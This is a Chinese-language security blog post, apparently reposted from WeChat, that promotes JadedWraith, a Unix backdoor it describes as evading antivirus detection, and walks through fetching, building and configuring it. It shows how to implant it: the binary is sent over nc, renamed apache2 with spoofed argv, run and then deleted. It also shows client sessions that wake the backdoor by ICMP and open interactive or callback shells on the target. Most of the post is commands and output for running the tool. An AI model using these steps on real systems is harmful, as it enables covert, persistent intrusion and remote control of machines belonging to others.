对红队及打CTF非常有用的工具
2022-1-16 09:34:0 Author: mp.weixin.qq.com(查看原文) 阅读量:26 收藏

文章来源 :菜鸟学安全

关于JadedWraith

JadedWraith是一款功能强大的轻量级Unix后门,仅供研究及教育目的使用。该工具对于红队研究人员和CTF参赛人员非常有用,并且可以在不被反病毒产品检测到的情况下植入目标系统。

功能介绍

JadedWraith是一个功能强大的后门,可以监听TCP端口,也可以嗅探数据包中的ICMP数据包,并控制后门返回信息或继续监听。

该工具基于类似PRISM的工具实现其功能,但与PRISM不同的是,JadedWraith使用了加密算法来对控制命令进行了混淆处理。

JadedWraith可以帮助广大研究人员在目标设备上执行远程命令或上传后续的Payload。

JadedWraith可以编译为独立的可执行文件,也可以编译为进程注入的共享对象。

JadedWraith组件

实际植入的后门源码存在于src目录中。client目录中包含了一个基于Python开发的客户端,主要用于跟JadedWraith进行交互。

项目中的conf_jawr脚本可以用于配置新的JadedWraith可执行程序。

依赖组件

植入的后门程序需要使用一个现代C代码库和libpthread。

具体取决于目标操作系统类型,可能还会需要使用到libpcap。

Python配置脚本和客户端的正常运行则需要使用到termcolor和pycryptodomex。

工具下载

广大研究人员可以使用下列命令将该项目源码克隆至本地:

git clone https://github.com/phath0m/JadedWraith.git

工具编译

广大研究人员可以直接使用Makefile来编译工具源码。

注意:编译完成后的代码将存储在bin目录中,而且必须在使用之前需要进行配置:

$ ./configure

$ make

$ ls -lart bin

-rwxrwxr-x. 1 root root 19712 Jul 31 13:08 JadedWraith-2.0.0-Linux-x86_64.elf

工具配置

我们可以使用conf_jawr脚本来配置JadedWraith可执行程序。

该脚本将搜索bin目录以寻找需要配置的JadedWraith可执行程序。

配置后的项目代码将会被写入至configured目录之中:

$ ./conf_jawr

JadedWraith Configuration

Please choose a JadedWraith binary to use:

JadedWraith-2.0.0-Linux-x86_64.elf

Binary : 1

Shared Key [95454c93c8d5d30a0782da72ade10e29] :

Enable passive mode (ICMP wakeup) ? [y/n] y

Wakeup Password [4Zw2TTtaIKBcyeoLwd7rrTasRlUF90vSZnLFzn2A4ab018Vj] :

argv[0] (Leave blank to not spoof command) [] :

JadedWraith Executable : /tmp/JadedWraith/configured/builds/JadedWraith-2.0.0-Linux-x86_64.1627752415.bin

Try me!

   sudo ./wraith-client.py <IP_ADDRESS> -k 95454c93c8d5d30a0782da72ade10e29 -P 4Zw2TTtaIKBcyeoLwd7rrTasRlUF90vSZnLFzn2A4ab018Vj

后门植入

配置好的后门程序可以直接在目标系统上运行。

如果配置时使用了被动ICMP功能,则后门程序必须以root权限运行。

环境变量_CMD可以用来欺骗进程的“argv[]”参数:

# cd /tmp

# nc -lvp 4444 > apache2

# chmod +x apache2

# _CMD="/usr/sbin/apache2" ./apache2

# rm apache2

后门交互

项目中client目录内的wraith-client.py脚本可以用于跟JadedWraith交互,我们可以直接使用conf_jawr脚本生成的参数来调用wraith-client.py脚本,将目标IP替换<IP_ADDRESS>。

如果使用ICMP功能,则必须以root用户身份运行脚本以发送ICMP数据包。

$ ~/JadedWraithFork/client> sudo ./wraith-client.py 192.168.100.224 -k 1deeb4a64440b8d13c84a8eb4e7c4453 -P y00nrnwpwXdvPOXSS6K0r7LelFeCBvKx91Oj0s5BrnLyx1WR

[+] sent ICMP wake up command to 192.168.100.224

[*] backdoor will listen on port 58290

[*] connecting to 192.168.100.224:58290

[+] connection established!

[*] entering interactive shell

>> .cd /tmp

>> w

 14:22:49 up  3:02,  1 user,  load average: 0.18, 0.19, 0.23

USER     TTY        [email protected]   IDLE   JCPU   PCPU WHAT

>> ps -ef

UID          PID    PPID  C STIME TTY          TIME CMD

root           1       0  0 11:20 ?        00:00:01 /usr/lib/systemd/systemd --switched-root --system --deserialize 31

>> .exit

$ sudo ./wraith-client.py 127.0.0.1 --callback 192.168.100.224 -k 1deeb4a64440b8d13c84a8eb4e7c4453 -P y00nrnwpwXdvPOXSS6K0r7LelFeCBvKx91Oj0s5BrnLyx1WR

[+] sent ICMP wake up command to 127.0.0.1

[*] backdoor will connect to port 37943

[*] listening on port 37943

[+] accepted connection!

[*] entering interactive shell

>>

项目地址

JadedWraith:https://github.com/phath0m/JadedWraith

参考资料

  • https://github.com/andreafabrizi/prism

声明:本公众号所分享内容仅用于网安爱好者之间的技术讨论,禁止用于违法途径,否则需自行承担,本公众号及作者不承担相应的后果.

侵权请私聊公众号删文



文章来源: http://mp.weixin.qq.com/s?__biz=MzAxMjE3ODU3MQ==&mid=2650531758&idx=3&sn=ba46e85251bd1eee63118ab1d913d0aa&chksm=83ba824ab4cd0b5cd66ccc3e6588fb656dcd00a7402610ed5e41fa555bbebe42eb02eb1be182#rd
如有侵权请联系:admin#unsafe.sh